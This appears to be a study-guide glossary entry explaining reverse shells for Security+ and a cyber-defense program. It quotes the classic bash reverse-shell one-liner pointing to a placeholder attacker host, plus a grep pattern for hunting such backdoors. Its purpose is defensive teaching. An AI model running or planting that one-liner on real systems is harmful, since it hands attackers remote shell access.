NCAE Mapping Hub Authoritative cross-reference for DCWF, NCAE Knowledge Units, O*NET, and the EWU Cyber Operations program

Security+ · 2.0 Threats

Reverse shell

A shell where the *victim* connects outbound to the attacker instead of the attacker connecting inbound. Defeats a typical inbound-only firewall. Classic bash idiom: `bash -i >& /dev/tcp/attacker/4444 0>&1`.

How this shows up at NCAE

When backdoor-hunting, `grep -rE '/dev/tcp|nc |bash -i'` in cron jobs and shell rcfiles catches most reverse-shell triggers. CCRI's blue team scripts have firewall rules that LOG-then-DROP outbound to block these.